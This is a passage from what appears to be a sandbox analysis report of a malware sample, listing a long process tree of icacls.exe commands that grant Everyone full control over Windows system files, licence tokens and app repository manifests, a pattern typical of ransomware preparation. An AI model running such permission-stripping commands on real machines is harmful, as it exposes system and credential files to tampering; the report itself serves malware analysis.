    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:6252
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:5140
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4824
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q
    3⤵
    PID:5972
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6344
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
    3⤵
    PID:6684
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q
    3⤵
    PID:5524
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4724
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6896
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2180
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6852
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3516
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\109c9870-7988-c77e-8ad0-376ab6e81351.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5828
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4272
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4868
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4972
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4372
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3480
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7140
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5932
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6948
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4936
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5424
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4592
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4992
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5944
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies data under HKEY_USERS
    PID:6736
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3852
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6904
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6564
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2844
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6928
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7036
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6268
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4188
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5048
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5428
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5244
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3128
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5060
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:7008
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4556
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6216
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5884
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6280
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e0e43bae-32f3-2aa6-ce7d-e4ee1e84a462.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4376
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4384
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5636
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5164
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6064
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6368
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3308
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5260
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6924
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
    3⤵
    PID:5160
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
    3⤵
    PID:4744
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
    3⤵
    PID:2816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2716
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6168
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5256
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4728
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5068
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7016
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6052
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5776
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5476
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6600
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5296
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6964
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4780
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5044
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5544
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4600
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5332
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5632
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7008
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6896
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:748
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Modifies data under HKEY_USERS
      PID:4684
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6568
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Modifies data under HKEY_USERS
      PID:5408
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2680
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4272
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6380
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5004
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6548
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7120
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5564
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7100
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3716
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5496
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6188
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7108
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6472
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6320
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4244
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3260
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6828
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4152
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6956
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3492
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6600
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6228
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6688
- - C:\Windows\system32\icacls.exe
